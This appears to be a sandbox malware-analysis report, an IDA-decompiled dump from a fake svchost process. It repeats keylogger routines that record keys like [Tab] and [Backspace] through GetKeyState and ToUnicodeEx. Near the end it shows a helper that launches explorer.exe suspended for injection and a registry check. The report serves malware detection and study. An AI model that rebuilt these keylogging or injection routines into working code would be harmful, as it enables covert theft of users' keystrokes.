							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Left Ctrl], xrefs: 00C85C8D
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C859E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859E3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Separator]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Separator], xrefs: 00C859E5
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8584B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8584B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Backspace]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Backspace], xrefs: 00C8584D

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C36, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C36(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Help]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Help], xrefs: 00C85C38

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A16, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A16(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Tab]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Tab], xrefs: 00C85A18

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85DE6, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboard

C-Code - Quality: 80%

			E00C85DE6(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Volume Up], xrefs: 00C85DE8
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83EA8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74
processsleep

C-Code - Quality: 100%

			E00C83EA8(WCHAR* __eax, struct _PROCESS_INFORMATION* __edx, void* __ebp) {
				struct _STARTUPINFOW _v80;
				void* _t12;
				struct _PROCESS_INFORMATION* _t27;
				WCHAR* _t35;
				void* _t36;

				_t27 = __edx;
				_t35 = __eax;
				_t36 = 0;
				E00C8291C();
				if(CreateProcessW(0, _t35, 0, 0, 0, 4, 0, 0,  &_v80, __edx) != 0) {
					_t36 = _t27->hProcess;
					E00C83D8C();
					_t2 =  &(_t27->dwProcessId); // 0xe60
					_t12 = E00C83E00( *_t2);
					_t40 = _t12 - 1;
					if(_t12 == 1) {
						TerminateProcess(_t27->hProcess, 0);
						E00C8291C();
						E00C8291C();
						if(CreateProcessW(0, E00C833A8(L"explorer.exe", 0xc83f74, _t40), 0, 0, 0, 4, 0, 0,  &_v80, _t27) == 0) {
							E00C8291C();
							E00C8291C();
							_t36 = 0;
							__eflags = 0;
						} else {
							_t36 =  *_t27;
						}
					}
					Sleep(0x64);
				}
				return _t36;
			}

0x00c83eae
0x00c83eb0
0x00c83eb2
0x00c83ebb
0x00c83edc
0x00c83ee2
0x00c83ee4
0x00c83ee9
0x00c83eec
0x00c83ef1
0x00c83ef3
0x00c83efa
0x00c83f06
0x00c83f12
0x00c83f42
0x00c83f4f
0x00c83f5b
0x00c83f60
0x00c83f60
0x00c83f44
0x00c83f44
0x00c83f44
0x00c83f42
0x00c83f64
0x00c83f64
0x00c83f71

APIs

CreateProcessW.KERNEL32(00000000,01970000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5

Part of subcall function 00C83D8C: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C83D95
Part of subcall function 00C83D8C: GetProcAddress.KERNEL32(?,IsWow64Process,00000000,00C83DD5,?,?,?,00C83EE9), ref: 00C83DB4
Part of subcall function 00C83D8C: FreeLibrary.KERNEL32(?,00C83DDC,00C83DD5,?,?,?,00C83EE9), ref: 00C83DCF

Part of subcall function 00C83E00: GetCurrentProcess.KERNEL32(?,00C91F1C), ref: 00C83E1E
Part of subcall function 00C83E00: IsWow64Process.KERNEL32(00000000,?,00C91F1C), ref: 00C83E24
Part of subcall function 00C83E00: OpenProcess.KERNEL32(00000400,00000000,00000E60), ref: 00C83E46
Part of subcall function 00C83E00: IsWow64Process.KERNEL32(?,?,00000000,00C83E98,?,00000400,00000000,00000E60), ref: 00C83E6A
Part of subcall function 00C83E00: CloseHandle.KERNEL32(?), ref: 00C83E92

TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Sleep.KERNEL32(00000064), ref: 00C83F64

Strings

explorer.exe, xrefs: 00C83F2E

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C89840, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
registry

C-Code - Quality: 100%

			E00C89840() {
				int _v8;
				int _v12;
				void* _v16;
				int _t13;

				_t13 = 0;
				if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\FakeMessage", 0, 1,  &_v12) == 0) {
					if(RegQueryValueExW(_v16, L"FakeMessage", 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
						_t13 = 1;
					}
					RegCloseKey(_v16);
				}
				return _t13;
			}

0x00c89844
0x00c8985c
0x00c8987d
0x00c89886
0x00c89886
0x00c8988c
0x00c8988c
0x00c89897

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89855
